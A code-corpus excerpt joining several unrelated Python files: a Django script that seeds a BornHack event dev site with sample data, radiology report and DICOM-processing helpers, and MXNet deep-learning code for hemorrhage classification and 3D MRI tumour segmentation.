memberships["bar"]["user1"] = TeamMember.objects.create(
team=teams["bar"], user=users[1], approved=True, responsible=True
)
memberships["bar"]["user3"] = TeamMember.objects.create(
team=teams["bar"], user=users[3], approved=True, responsible=True
)
memberships["bar"]["user2"] = TeamMember.objects.create(
team=teams["bar"], user=users[2], approved=True
)
memberships["bar"]["user7"] = TeamMember.objects.create(
team=teams["bar"], user=users[7], approved=True
)
memberships["bar"]["user8"] = TeamMember.objects.create(
team=teams["bar"], user=users[8]
)
# orga team
memberships["orga"] = {}
memberships["orga"]["user1"] = TeamMember.objects.create(
team=teams["orga"], user=users[1], approved=True, responsible=True
)
memberships["orga"]["user3"] = TeamMember.objects.create(
team=teams["orga"], user=users[3], approved=True, responsible=True
)
memberships["orga"]["user8"] = TeamMember.objects.create(
team=teams["orga"], user=users[8], approved=True, responsible=True
)
memberships["orga"]["user9"] = TeamMember.objects.create(
team=teams["orga"], user=users[9], approved=True, responsible=True
)
memberships["orga"]["user4"] = TeamMember.objects.create(
team=teams["orga"], user=users[4], approved=True, responsible=True
)
# shuttle team
memberships["shuttle"] = {}
memberships["shuttle"]["user7"] = TeamMember.objects.create(
team=teams["shuttle"], user=users[7], approved=True, responsible=True
)
memberships["shuttle"]["user3"] = TeamMember.objects.create(
team=teams["shuttle"], user=users[3], approved=True
)
memberships["shuttle"]["user9"] = TeamMember.objects.create(
team=teams["shuttle"], user=users[9]
)
return memberships
def create_camp_team_shifts(self, camp, teams, team_memberships):
shifts = {}
year = camp.camp.lower.year
self.output("Creating team shifts for {}...".format(year))
shifts[0] = TeamShift.objects.create(
team=teams["shuttle"],
shift_range=(
tz.localize(datetime(year, 8, 27, 2, 0)),
tz.localize(datetime(year, 8, 27, 8, 0)),
),
people_required=1,
)
shifts[0].team_members.add(team_memberships["shuttle"]["user7"])
shifts[1] = TeamShift.objects.create(
team=teams["shuttle"],
shift_range=(
tz.localize(datetime(year, 8, 27, 8, 0)),
tz.localize(datetime(year, 8, 27, 14, 0)),
),
people_required=1,
)
shifts[2] = TeamShift.objects.create(
team=teams["shuttle"],
shift_range=(
tz.localize(datetime(year, 8, 27, 14, 0)),
tz.localize(datetime(year, 8, 27, 20, 0)),
),
people_required=1,
)
def create_camp_info_categories(self, camp, teams):
categories = {}
year = camp.camp.lower.year
self.output("Creating infocategories for {}...".format(year))
categories["when"] = InfoCategory.objects.create(
team=teams["orga"], headline="When is BornHack happening?", anchor="when"
)
categories["travel"] = InfoCategory.objects.create(
team=teams["orga"], headline="Travel Information", anchor="travel"
)
categories["sleep"] = InfoCategory.objects.create(
team=teams["orga"], headline="Where do I sleep?", anchor="sleep"
)
return categories
def create_camp_info_items(self, camp, categories):
year = camp.camp.lower.year
self.output("Creating infoitems for {}...".format(year))
InfoItem.objects.create(
category=categories["when"],
headline="Opening",
anchor="opening",
body="BornHack {} starts saturday, august 27th, at noon (12:00). It will be possible to access the venue before noon if for example you arrive early in the morning with the ferry. But please dont expect everything to be ready before noon :)".format(
year
),
)
InfoItem.objects.create(
category=categories["when"],
headline="Closing",
anchor="closing",
body="BornHack {} ends saturday, september 3rd, at noon (12:00). Rented village tents must be empty and cleaned at this time, ready to take down. Participants must leave the site no later than 17:00 on the closing day (or stay and help us clean up).".format(
year
),
)
InfoItem.objects.create(
category=categories["travel"],
headline="Public Transportation",
anchor="public-transportation",
body=output_fake_md_description(),
)
InfoItem.objects.create(
category=categories["travel"],
headline="Bus to and from BornHack",
anchor="bus-to-and-from-bornhack",
body="PROSA, the union of IT-professionals in Denmark, has set up a great deal for BornHack attendees travelling from Copenhagen to BornHack. For only 125kr, about 17 euros, you can be transported to the camp on opening day, and back to Copenhagen at the end of the camp!",
)
InfoItem.objects.create(
category=categories["when"],
headline="Driving and Parking",
anchor="driving-and-parking",
body=output_fake_md_description(),
)
InfoItem.objects.create(
category=categories["sleep"],
headline="Camping",
anchor="camping",
body="BornHack is first and foremost a tent camp. You need to bring a tent to sleep in. Most people go with some friends and make a camp somewhere at the venue. See also the section on Villages - you might be able to find some likeminded people to camp with.",
)
InfoItem.objects.create(
category=categories["sleep"],
headline="Cabins",
anchor="cabins",
body="We rent out a few cabins at the venue with 8 beds each for people who don't want to sleep in tents for some reason. A tent is the cheapest sleeping option (you just need a ticket), but the cabins are there if you want them.",
)
def create_camp_feedback(self, camp, users):
year = camp.camp.lower.year
self.output("Creating feedback for {}...".format(year))
Feedback.objects.create(
camp=camp, user=users[1], feedback="Awesome event, will be back next year"
)
Feedback.objects.create(
camp=camp,
user=users[3],
feedback="Very nice, though a bit more hot water would be awesome",
)
Feedback.objects.create(
camp=camp, user=users[5], feedback="Is there a token here?"
)
Feedback.objects.create(
camp=camp, user=users[9], feedback="That was fun. Thanks!"
)
def create_camp_rides(self, camp, users):
year = camp.camp.lower.year
self.output("Creating rides for {}...".format(year))
Ride.objects.create(
camp=camp,
user=users[1],
seats=2,
from_location="Copenhagen",
to_location="BornHack",
when=tz.localize(datetime(year, 8, 27, 12, 0)),
description="I have space for two people and a little bit of luggage",
)
Ride.objects.create(
camp=camp,
user=users[1],
seats=2,
from_location="BornHack",
to_location="Copenhagen",
when=tz.localize(datetime(year, 9, 4, 12, 0)),
description="I have space for two people and a little bit of luggage",
)
Ride.objects.create(
camp=camp,
user=users[4],
seats=1,
from_location="Aarhus",
to_location="BornHack",
when=tz.localize(datetime(year, 8, 27, 12, 0)),
description="I need a ride and have a large backpack",
)
def create_camp_cfp(self, camp):
year = camp.camp.lower.year
self.output("Creating CFP for {}...".format(year))
camp.call_for_participation_open = True
camp.call_for_participation = "Please give a talk at Bornhack {}...".format(
year
)
camp.save()
def create_camp_cfs(self, camp):
year = camp.camp.lower.year
self.output("Creating CFS for {}...".format(year))
camp.call_for_sponsors_open = True
camp.call_for_sponsors = "Please give us ALL the money so that we can make Bornhack {} the best ever!".format(
year
)
camp.save()
def create_camp_sponsor_tiers(self, camp):
tiers = {}
year = camp.camp.lower.year
self.output("Creating sponsor tiers for {}...".format(year))
tiers["platinum"] = SponsorTier.objects.create(
name="Platinum sponsors",
description="- 10 tickets\n- logo on website\n- physical banner in the speaker's tent\n- thanks from the podium\n- recruitment area\n- sponsor meeting with organizers\n- promoted HackMe\n- sponsored social event",
camp=camp,
weight=0,
tickets=10,
)
tiers["gold"] = SponsorTier.objects.create(
name="Gold sponsors",
description="- 10 tickets\n- logo on website\n- physical banner in the speaker's tent\n- thanks from the podium\n- recruitment area\n- sponsor meeting with organizers\n- promoted HackMe",
camp=camp,
weight=1,
tickets=10,
)
tiers["silver"] = SponsorTier.objects.create(
name="Silver sponsors",
description="- 5 tickets\n- logo on website\n- physical banner in the speaker's tent\n- thanks from the podium\n- recruitment area\n- sponsor meeting with organizers",
camp=camp,
weight=2,
tickets=5,
)
tiers["sponsor"] = SponsorTier.objects.create(
name="Sponsors",
description="- 2 tickets\n- logo on website\n- physical banner in the speaker's tent\n- thanks from the podium\n- recruitment area",
camp=camp,
weight=3,
tickets=2,
)
return tiers
def create_camp_sponsors(self, camp, tiers):
year = camp.camp.lower.year
self.output("Creating sponsors for {}...".format(year))
Sponsor.objects.create(
name="PROSA",
tier=tiers["platinum"],
description="Bus Trip",
logo_filename="PROSA-logo.png",
url="https://www.prosa.dk",
)
Sponsor.objects.create(
name="DKUUG",
tier=tiers["platinum"],
description="Speakers tent",
logo_filename="DKUUGlogo.jpeg",
url="http://www.dkuug.dk/",
)
Sponsor.objects.create(
name="LetsGo",
tier=tiers["silver"],
description="Shuttle",
logo_filename="letsgo.png",
url="https://letsgo.dk",
)
Sponsor.objects.create(
name="<NAME>",
tier=tiers["gold"],
description="Cash Sponsorship",
logo_filename="saxobank.png",
url="https://home.saxo",
)
Sponsor.objects.create(
name="CSIS",
tier=tiers["sponsor"],
description="Cash Sponsorship",
logo_filename="CSIS_PRI_LOGO_TURQUOISE_RGB.jpg",
url="https://csis.dk",
)
def create_camp_tokens(self, camp):
tokens = {}
year = camp.camp.lower.year
self.output("Creating tokens for {}...".format(year))
tokens[0] = Token.objects.create(
camp=camp,
token=get_random_string(length=32),
category="Physical",
description="Token in the back of the speakers tent (in binary)",
)
tokens[1] = Token.objects.create(
camp=camp,
token=get_random_string(length=32),
category="Internet",
description="Twitter",
)
tokens[2] = Token.objects.create(
camp=camp,
token=get_random_string(length=32),
category="Website",
description="Token hidden in the X-Secret-Token HTTP header on the BornHack website",
)
tokens[3] = Token.objects.create(
camp=camp,
token=get_random_string(length=32),
category="Physical",
description="Token in infodesk (QR code)",
)
tokens[4] = Token.objects.create(
camp=camp,
token=get_random_string(length=32),
category="Physical",
description="Token on the back of the BornHack {} badge".format(year),
)
tokens[5] = Token.objects.create(
camp=camp,
token=get_random_string(length=32),
category="Website",
description="Token hidden in EXIF data in the logo posted on the website sunday",
)
return tokens
def create_camp_token_finds(self, camp, tokens, users):
year = camp.camp.lower.year
self.output("Creating token finds for {}...".format(year))
TokenFind.objects.create(token=tokens[3], user=users[4])
TokenFind.objects.create(token=tokens[5], user=users[4])
TokenFind.objects.create(token=tokens[2], user=users[7])
TokenFind.objects.create(token=tokens[1], user=users[3])
TokenFind.objects.create(token=tokens[4], user=users[2])
TokenFind.objects.create(token=tokens[5], user=users[6])
for i in range(0, 6):
TokenFind.objects.create(token=tokens[i], user=users[1])
def output(self, message):
self.stdout.write(
"%s: %s" % (timezone.now().strftime("%Y-%m-%d %H:%M:%S"), message)
)
def handle(self, *args, **options):
start = timezone.now()
self.output(
self.style.SUCCESS("----------[ Running bootstrap-devsite ]----------")
)
self.output(self.style.SUCCESS("----------[ Global stuff ]----------"))
camps = self.create_camps()
self.create_event_routing_types()
users = self.create_users()
self.create_news()
event_types = self.create_event_types()
self.create_url_types()
product_categories = self.create_product_categories()
global_products = self.create_global_products(product_categories)
quickfeedback_options = self.create_quickfeedback_options()
for (camp, read_only) in camps:
year = camp.camp.lower.year
self.output(
self.style.SUCCESS("----------[ Bornhack {} ]----------".format(year))
)
if year < 2021:
ticket_types = self.create_camp_ticket_types(camp)
camp_products = self.create_camp_products(
camp, product_categories, ticket_types
)
self.create_orders(users, global_products, camp_products)
self.create_camp_tracks(camp)
locations = self.create_event_locations(camp)
self.create_camp_news(camp)
teams = self.create_camp_teams(camp)
self.create_camp_team_tasks(camp, teams)
team_memberships = self.create_camp_team_memberships(camp, teams, users)
self.create_camp_team_shifts(camp, teams, team_memberships)
self.create_camp_cfp(camp)
self.create_camp_proposals(camp, event_types)
self.create_proposal_urls(camp)
self.create_camp_event_sessions(camp, event_types, locations)
self.generate_speaker_availability(camp)
try:
self.approve_speaker_proposals(camp)
except ValidationError:
self.output(
"Name collision, bad luck. Run 'manage.py flush' and run the bootstrap script again!"
)
sys.exit(1)
self.approve_event_proposals(camp)
self.create_camp_scheduling(camp)
# shuffle it up - delete and create new random availability
self.generate_speaker_availability(camp)
# and create some speaker<>event conflicts
self.create_camp_speaker_event_conflicts(camp)
# recalculate the autoschedule
self.create_camp_rescheduling(camp)
self.create_camp_villages(camp, users)
facility_types = self.create_facility_types(
camp, teams, quickfeedback_options
)
facilities = self.create_facilities(facility_types)
self.create_facility_feedbacks(facilities, quickfeedback_options, users)
info_categories = self.create_camp_info_categories(camp, teams)
self.create_camp_info_items(camp, info_categories)
self.create_camp_feedback(camp, users)
self.create_camp_rides(camp, users)
self.create_camp_cfs(camp)
sponsor_tiers = self.create_camp_sponsor_tiers(camp)
self.create_camp_sponsors(camp, sponsor_tiers)
tokens = self.create_camp_tokens(camp)
self.create_camp_token_finds(camp, tokens, users)
else:
self.output("Not creating anything for this year yet")
camp.read_only = read_only
camp.call_for_participation_open = not read_only
camp.call_for_sponsors_open = not read_only
camp.save()
self.output("----------[ Finishing up ]----------")
self.output("Adding event routing...")
Routing.objects.create(
team=teams["orga"],
eventtype=Type.objects.get(name="public_credit_name_changed"),
)
Routing.objects.create(
team=teams["orga"], eventtype=Type.objects.get(name="ticket_created")
)
self.output("done!")
duration = timezone.now() - start
self.output(f"bootstrap-devsite took {duration}!")
``` |
{
"source": "johncolby/rad_apps",
"score": 2
} |
#### File: rad_apps/rad_apps/tasks.py
```python
import os
from rad_apps import app, app_list
from .email import send_email
def app_wrapper(app_name, form):
rad_app = app_list.apps[app_name]
rad_app.wrapper_fun(app, form)
if form['email']:
report_name = f'{form["acc"]}_{app_name}.pdf'
output_dir = os.path.join(app.config['OUTPUT_DIR_NODE'], app_name)
report_path = os.path.join(output_dir, form["acc"], f'{app_name}.pdf')
app.app_context().push()
with open(os.path.join(report_path), 'rb') as fp:
send_email(subject=f'secure: {rad_app.long_name} analysis report',
sender=app.config['MAIL_USERNAME'],
recipients=[form['email']],
text_body=f'Accession #: {form["acc"]}\n\n',
attachments=[(report_name, 'application/pdf', fp.read())])
```
#### File: johncolby/rad_apps/radstudy.py
```python
import air_download.air_download as air
import argparse
import glob
import logging
import os
import pandas as pd
import pydicom
import shutil
import tempfile
import zipfile
from datetime import datetime
import rpy2.robjects as ro
from rpy2.robjects import pandas2ri
pandas2ri.activate()
class RadStudy():
def __init__(self, acc='', zip_path='', model_path='', download_url='',
cred_path='', process_url='', output_dir=''):
self.zip_path = zip_path
self.model_path = model_path
self.dir_tmp = ''
self.dir_study = ''
self.channels = []
self.series_picks = pd.DataFrame()
self.acc = acc
self.hdr = ''
self.series = None
self.study_date = ''
self.app_name = ''
self.download_url = download_url
self.cred_path = cred_path
self.process_url = process_url
self.output_dir = output_dir
# assert self.acc or self.zip_path, 'No input study provided.'
def process(self):
raise NotImplementedError
def download(self):
"""Download study via AIR API"""
assert not self.zip_path, '.zip path already available.'
assert self.dir_tmp, 'Working area not setup yet.'
args = argparse.Namespace()
args.URL = self.download_url
args.acc = self.acc
args.cred_path = self.cred_path
args.profile = -1
args.output = os.path.join(self.dir_tmp, f'{self.acc}.zip')
air.main(args)
self.zip_path = args.output
self._extract()
self.setup()
def _extract(self):
"""Extract study archive"""
assert not self.dir_study, 'dir_study already exists.'
dir_study = os.path.join(self.dir_tmp, 'dcm')
os.mkdir(dir_study)
zip_ref = zipfile.ZipFile(self.zip_path, 'r')
zip_ref.extractall(path=dir_study)
self.dir_study = os.path.join(dir_study, os.listdir(dir_study)[0])
def setup(self):
"""Setup study for processing"""
# Create table of series picks
if self.series_picks.empty:
self.series_picks = pd.DataFrame({'class': self.channels,
'prob': '',
'SeriesNumber': '',
'series': ''})
# Create temporary working directory
if not self.dir_tmp:
self.dir_tmp = tempfile.mkdtemp()
os.mkdir(os.path.join(self.dir_tmp, 'nii'))
os.mkdir(os.path.join(self.dir_tmp, 'output'))
# Extract study archive
if not self.dir_study and self.zip_path:
self._extract()
# Load representative DICOM headers
if self.dir_study and not self.hdr:
series_paths = glob.glob(f'{self.dir_study}/*')
series_numbers = [self._get_series_number(series_path) for series_path in series_paths]
self.series = pd.DataFrame({'SeriesNumber': series_numbers, 'path': series_paths})
dcm_path = glob.glob(f'{self.dir_study}/*/*.dcm', recursive=True)[0]
self.hdr = pydicom.read_file(dcm_path)
self.acc = self.hdr.AccessionNumber
self.study_date = datetime.strptime(self.hdr.StudyDate, '%Y%m%d').strftime('%m/%d/%Y')
def classify_series(self):
"""Classify series into modalities"""
ro.r['library']('dcmclass')
ro.r['load'](self.model_path)
self.series_picks = ro.r['predict_headers'](os.path.dirname(self.dir_study), ro.r['models'], ro.r['tb_preproc'])
paths = [os.path.abspath(os.path.join(self.dir_study, series)) for series in self.series_picks.series.tolist()]
self.series_picks['series'] = paths
def add_paths(self, paths):
"""Manually specify directory paths to required series"""
self.series_picks.series = paths
def _get_series_number(self, series_path):
dcm_path = glob.glob(f'{series_path}/*')[0]
return pydicom.read_file(dcm_path).SeriesNumber
def series_to_path(self, series):
"""Convert a SeriesNumber to path"""
return self.series.loc[self.series['SeriesNumber'] == series, 'path'].values[0]
def report(self):
"""Generate PDF report"""
ro.r['library']('ucsfreports')
params = ro.ListVector({'input_path': self.dir_tmp,
'patient_name': self.hdr.PatientName.family_comma_given(),
'patient_MRN': self.hdr.PatientID,
'patient_acc': self.hdr.AccessionNumber,
'study_date': self.study_date})
ro.r['ucsf_report'](self.app_name, output_dir=os.path.join(self.dir_tmp, 'output'), params=params)
def copy_results(self, output_dir='.'):
src = os.path.join(self.dir_tmp, 'output')
dest = os.path.join(self.output_dir, self.acc)
assert not os.path.exists(dest), 'Output directory already exists.'
shutil.copytree(src, dest)
def __str__(self):
s_picks = str(self.series_picks.iloc[:, 0:3]) if not self.series_picks.empty else ''
s = ('Radiology study object\n'
f' Accession #: {self.acc}\n'
f' dir_tmp: {self.dir_tmp}\n'
f' Series picks:\n{s_picks}')
return s
def rm_tmp(self):
"""Remove temporary working area"""
if not self.dir_tmp == '':
shutil.rmtree(self.dir_tmp)
else:
print('Nothing to remove.')
def run(self):
try:
self.setup()
self.download()
self.process()
self.report()
self.copy_results()
self.rm_tmp()
except:
logging.exception('Processing failed.')
self.rm_tmp()
```
#### File: johncolby/rad_apps/testapp.py
```python
from flask_wtf import FlaskForm
import os
from urllib.parse import urljoin
from rad_apps.appplugin import AppPlugin
from radstudy import RadStudy
class Options(FlaskForm):
def __init__(self, csrf_enabled=False, *args, **kwargs):
super(Options, self).__init__(csrf_enabled=csrf_enabled, *args, **kwargs)
class TestStudy(RadStudy):
def download(self):
pass
def process(self):
pass
def report(self):
report_path = os.path.join(self.dir_tmp, 'output', 'test.pdf')
with open(report_path, 'w') as fh:
print(f'Accession: {self.acc}', file=fh)
def wrapper_fun(app, form):
TestStudy(acc = form['acc'],
# download_url = app.config['AIR_URL'],
# cred_path = app.config['DOTENV_FILE'],
# process_url = urljoin(app.config['SEG_URL'], 'test'),
output_dir = os.path.join(app.config['OUTPUT_DIR_NODE'], 'test')
).run()
app = AppPlugin(long_name = 'Test application',
short_name = 'test',
form_opts = Options,
wrapper_fun = wrapper_fun)
``` |
{
"source": "johncolby/rsna_heme",
"score": 2
} |
#### File: rsna_heme/rsna_heme/cnn.py
```python
import gluoncv
import mxnet as mx
from mxnet import nd, autograd, gluon
def get_model(args):
net = gluoncv.model_zoo.get_model(args.model_name, pretrained = args.pretrained)
with net.name_scope():
if hasattr(net, 'fc'):
output_name = 'fc'
elif hasattr(net, 'output'):
output_name = 'output'
setattr(net, output_name, mx.gluon.nn.Dense(args.classes))
if hasattr(args, 'params_path'):
net.load_parameters(args.params_path)
elif args.pretrained is True:
getattr(net, output_name).initialize(mx.init.Xavier(), ctx = args.ctx)
else:
net.initialize(mx.init.Xavier(), ctx = args.ctx)
net.collect_params().reset_ctx(args.ctx)
net.hybridize()
return net
def forward_pass(net, loss_fcn, data, labels, weights):
outputs = [net(X) for X in data]
losses = [loss_fcn(yhat, y, w) for yhat, y, w in zip(outputs, labels, weights)]
return [outputs, losses]
def process_data(net, loss_fcn, dataloader, ctx, trainer=None):
metric_loss = mx.metric.Loss()
metric_acc = mx.metric.Accuracy()
for i, batch in enumerate(dataloader):
weights = nd.ones_like(batch[1]) * nd.array([2, 1, 1, 1, 1, 1])
weights = gluon.utils.split_and_load(weights, ctx_list=ctx, batch_axis=0, even_split=False)
data = gluon.utils.split_and_load(batch[0], ctx_list=ctx, batch_axis=0, even_split=False)
labels = gluon.utils.split_and_load(batch[1], ctx_list=ctx, batch_axis=0, even_split=False)
if trainer is not None:
with autograd.record():
[outputs, losses] = forward_pass(net, loss_fcn, data, labels, weights)
for l in losses:
l.backward()
trainer.step(len(batch[0]))
else:
[outputs, losses] = forward_pass(net, loss_fcn, data, labels, weights)
metric_loss.update(labels, losses)
metric_acc.update([l[:,0] for l in labels], [(nd.sign(o[:,0]) + 1) / 2 for o in outputs])
if dataloader.__class__.__name__ is 'tqdm' and (i < (len(dataloader) - 1)):
dataloader.set_description(f'loss {metric_loss.get()[1]:.4f}')
_, loss = metric_loss.get()
_, acc = metric_acc.get()
return [loss, acc]
```
#### File: rsna_heme/rsna_heme/io.py
```python
import mxnet as mx
import numpy as np
import os
import pandas as pd
from sklearn.model_selection import StratifiedKFold
from tqdm import tqdm
from . import dicom
from . import labels
from . import logger
def pack_rec(base_dir, stage, mode, wl, out_dir = None):
if out_dir == None:
out_dir = base_dir
name_str = f'stage_{stage}_{mode}'
log = logger.Logger(out_dir, name_str)
log.log(locals())
dcm_dir = os.path.join(base_dir, f'{name_str}_images')
# Load class labels
if mode == 'train':
df = labels.read_labels(base_dir)
elif mode == 'test':
df = labels.ids_from_dir(dcm_dir)
# Open recordIO file for writing
if not os.path.exists(out_dir):
os.makedirs(out_dir)
rec_path = os.path.join(out_dir, name_str + '.rec')
idx_path = os.path.join(out_dir, name_str + '.idx')
record = mx.recordio.MXIndexedRecordIO(idx_path, rec_path, 'w')
# Loop over subjects
for i, (ID, row) in enumerate(tqdm(df.iterrows(), total=len(df))):
# Get DICOM path
dcm_name = ID + '.dcm'
dcm_path = os.path.join(dcm_dir, dcm_name)
# Load DICOM and extract image data
dcm = dicom.Dicom(dcm_path)
# img = dcm.img_for_plot(center = center, width = width)
img = dcm.img_for_plot3(wl)
# Generate recordIO header
if mode == 'train':
col_names = labels.heme_types
label = row[col_names].array
else:
label = 0
header = mx.recordio.IRHeader(0, label, i, 0)
# Pack data into binary recordIO format as compressed jpg
img_packed = mx.recordio.pack_img(header, img, quality=100)
# Append record to recordIO file
record.write_idx(i, img_packed)
record.close()
log.close()
class CVSampler(mx.gluon.data.sampler.Sampler):
def __init__(self, groups, n_splits, i_fold, mode = 'train', shuffle = True, seed = 1):
self.n_splits = n_splits
self.seed = seed
self.groups = groups
self.folds = self.get_folds()
self._indices = self.folds[i_fold][mode]
self._shuffle = shuffle
self._length = len(self._indices)
def __iter__(self):
if self._shuffle:
np.random.shuffle(self._indices)
return iter(self._indices)
def __len__(self):
return self._length
def get_folds(self):
skf = StratifiedKFold(n_splits = self.n_splits, shuffle = True, random_state = self.seed)
folds = [{'train': tr, 'test': te} for tr, te in skf.split(X = np.zeros(len(self.groups)), y = self.groups)]
return folds
def save_params(net, best_metric, current_metric, epoch, save_interval, prefix):
"""Logic for if/when to save/checkpoint model parameters"""
if current_metric < best_metric:
best_metric = current_metric
net.save_parameters('{:s}_best.params'.format(prefix, epoch, current_metric))
with open(prefix+'_best.log', 'a') as f:
f.write('\n{:04d}:\t{:.4f}'.format(epoch, current_metric))
if save_interval and (epoch + 1) % save_interval == 0:
net.save_parameters('{:s}_{:04d}_{:.4f}.params'.format(prefix, epoch, current_metric))
return best_metric
``` |
{
"source": "johncolby/svid_paper",
"score": 2
} |
#### File: johncolby/svid_paper/unet.py
```python
import os
import logging
from mxboard import SummaryWriter
import glob
import itertools
import numpy as np
import nibabel as nib
import mxnet as mx
from mxnet import gluon, autograd, ndarray as nd
from mxnet.gluon.nn import Activation, Conv3D, Conv3DTranspose, \
BatchNorm, HybridSequential, HybridBlock, Dropout, MaxPool3D
import gluoncv
from gluoncv.data.segbase import SegmentationDataset
from scipy.ndimage import affine_transform
from math import pi
from transforms3d import affines, euler
################################################################################
# MRI segmentation dataset
class MRISegDataset(SegmentationDataset):
"""Semantic segmentation directory dataset class for MRI volumetric data"""
NUM_CLASS = 4
def __init__(self, root, split='train', fold_inds=None, mode=None,
transform=None, means=None, stds=None, lesion_frac=0.9, warp_params=None, **kwargs):
super(MRISegDataset, self).__init__(root, split, mode, transform, warp_params, **kwargs)
self.fold_inds = fold_inds
self.means = means
self.stds = stds
self.lesion_frac = lesion_frac
self.warp_params = warp_params
# Get input file path lists
if split == 'train':
#import pdb; pdb.set_trace()
self._dataset_root = os.path.join(root, 'training')
self.sub_dirs = glob.glob(self._dataset_root + '/*/*/')
if fold_inds is not None:
mask = np.ones(len(self.sub_dirs), np.bool)
mask[fold_inds] = 0
ikeep = np.arange(0, len(self.sub_dirs))[mask]
self.sub_dirs = np.array(self.sub_dirs)[ikeep]
if self.means is not None: self.means = self.means[ikeep]
if self.stds is not None: self.stds = self.stds[ikeep]
elif split == 'val':
self._dataset_root = os.path.join(root, 'training')
self.sub_dirs = glob.glob(self._dataset_root + '/*/*/')
if fold_inds is not None:
fold_dirs = np.array(self.sub_dirs)[fold_inds]
self.sub_dirs = fold_dirs
if self.means is not None: self.means = self.means[fold_inds]
if self.stds is not None: self.stds = self.stds[fold_inds]
elif split == 'test':
self._dataset_root = os.path.join(root, 'validation')
self.sub_dirs = glob.glob(self._dataset_root + '/*/')
else:
raise RuntimeError('Unknown dataset split: {}'.format(split))
def __getitem__(self, idx):
#import pdb; pdb.set_trace()
_sub_name = os.path.basename(os.path.dirname(self.sub_dirs[idx]))
# Load multichannel input data
channels = ['flair', 't1', 't1ce', 't2']
img_paths = [os.path.join(self.sub_dirs[idx], _sub_name + '_' + channel + '.nii.gz') for channel in channels]
img = []
for img_path in img_paths:
img.append(nib.load(img_path).get_fdata())
img = np.array(img)
img = np.flip(img, 2) # Correct AP orientation
# Load segmentation label map
target = None
if self.split is not 'test':
target = nib.load(os.path.join(self.sub_dirs[idx], _sub_name + '_seg.nii.gz')).get_fdata()
target[target==4] = 3 # Need to have consecutive integers [0, n_classes) for training
else:
target = np.zeros_like(img[0,:]) # dummy segmentation
target = np.expand_dims(target, axis=0)
target = np.flip(target, 2) # Correct AP orientation
# Data augmentation
if self.mode == 'train':
img, target = self._sync_transform(img, target)
elif self.mode == 'val':
img, target = self._val_sync_transform(img, target)
else:
raise RuntimeError('unknown mode for dataloader: {}'.format(self.mode))
# Routine img specific processing (normalize, etc.)
if self.transform is not None:
img = self.transform(img, self.means[idx], self.stds[idx])
return img, target
def _sync_transform(self, img, mask):
crop_size = self.crop_size
# Random LR flip
if np.random.random() < 0.5:
img = np.fliplr(img)
mask = np.fliplr(mask)
# Pad if smaller than crop_size
if any(np.array(img.shape[1:]) < crop_size):
img, mask = img_pad(img, mask, crop_size)
# Random crop if larger than crop_size
if any(np.array(img.shape[1:]) > crop_size):
img, mask = img_crop(img, mask, crop_size, self.lesion_frac)
# Random affine
if self.warp_params:
img, mask = img_warp(img, mask, self.warp_params['theta_max'],
self.warp_params['offset_max'],
self.warp_params['scale_max'],
self.warp_params['shear_max'])
# final transform to mxnet NDArray
img, mask = self._img_transform(img), self._mask_transform(mask)
return img, mask
def _val_sync_transform(self, img, mask):
crop_size = self.crop_size
# Pad if smaller than crop_size
if any(np.array(img.shape[1:]) < crop_size):
img, mask = img_pad(img, mask, crop_size)
# final transform to mxnet NDArray
img, mask = self._img_transform(img), self._mask_transform(mask)
return img, mask
def __len__(self):
return len(self.sub_dirs)
def paths(self):
return self.sub_dirs
@property
def classes(self):
"""Category names."""
return ('background', 'necrotic', 'edema', 'enhancing')
class MRISegDataset4D(MRISegDataset):
"""Dataset class with all inputs and GT seg combined into a single 4D NifTI"""
def __getitem__(self, idx):
#import pdb; pdb.set_trace()
_sub_name = os.path.basename(os.path.dirname(self.sub_dirs[idx]))
# Load multichannel input data
img_path = os.path.join(self.sub_dirs[idx], _sub_name + '_' + '4D' + '.nii.gz')
img_raw = nib.load(img_path).get_fdata()
img_raw = img_raw.transpose((3,0,1,2))
img_raw = np.flip(img_raw, 2) # Correct AP orientation
img = img_raw[0:4]
# Load segmentation label map
if self.split is not 'test':
target = img_raw[4]
target[target==4] = 3 # Need to have consecutive integers [0, n_classes) for training
else:
target = np.zeros_like(img[0,:]) # dummy segmentation
target = np.expand_dims(target, axis=0)
# Data augmentation
if self.mode == 'train':
img, target = self._sync_transform(img, target)
elif self.mode == 'val':
img, target = self._val_sync_transform(img, target)
else:
raise RuntimeError('unknown mode for dataloader: {}'.format(self.mode))
# Routine img specific processing (normalize, etc.)
if self.transform is not None:
img = self.transform(img, self.means[idx], self.stds[idx])
return img, target
def img_pad(img, mask, pad_dims):
"""Pad input image vol to given voxel dims"""
x_pad0, x_pad1, y_pad0, y_pad1, z_pad0, z_pad1 = 0,0,0,0,0,0
dims = img.shape[1:]
if dims[0] < pad_dims[0]:
x_pad0 = (pad_dims[0] - dims[0]) // 2
x_pad1 = pad_dims[0] - dims[0] - x_pad0
if dims[1] < pad_dims[1]:
y_pad0 = (pad_dims[1] - dims[1]) // 2
y_pad1 = pad_dims[1] - dims[1] - y_pad0
if dims[2] < pad_dims[2]:
z_pad0 = (pad_dims[2] - dims[2]) // 2
z_pad1 = pad_dims[2] - dims[2] - z_pad0
padding = ((0, 0), (x_pad0, x_pad1), (y_pad0, y_pad1), (z_pad0, z_pad1))
img = np.pad(img, padding, 'constant', constant_values=0)
mask = np.pad(mask, padding, 'constant', constant_values=0)
return img, mask
def img_unpad(img, dims):
"""Unpad image vol back to original input dimensions"""
pad_dims = img.shape
xmin, ymin, zmin = 0, 0, 0
if pad_dims[0] > dims[0]:
xmin = (pad_dims[0] - dims[0]) // 2
if pad_dims[1] > dims[1]:
ymin = (pad_dims[1] - dims[1]) // 2
if pad_dims[2] > dims[2]:
zmin = (pad_dims[2] - dims[2]) // 2
return img[xmin : xmin + dims[0],
ymin : ymin + dims[1],
zmin : zmin + dims[2]]
def img_crop(img, mask, crop_size, lesion_frac=0.9):
"""Sample a random image subvol/patch from larger input vol"""
# Pick the location for the patch centerpoint
if np.random.random() < lesion_frac:
good_inds = (mask.squeeze() != 0).nonzero() # sample all lesion voxels
else:
good_inds = (img[0,] != 0).nonzero() # sample all brain voxels
i_center = np.random.randint(len(good_inds[0]))
xmin = good_inds[0][i_center] - crop_size[0] // 2
ymin = good_inds[1][i_center] - crop_size[1] // 2
zmin = good_inds[2][i_center] - crop_size[2] // 2
# Make sure centerpoint is not too small
if xmin < 0: xmin = 0
if ymin < 0: ymin = 0
if zmin < 0: zmin = 0
# Make sure centerpoint is not too big
max_sizes = np.array(img.shape[1:]) - crop_size
if xmin > max_sizes[0]: xmin = max_sizes[0]
if ymin > max_sizes[1]: ymin = max_sizes[1]
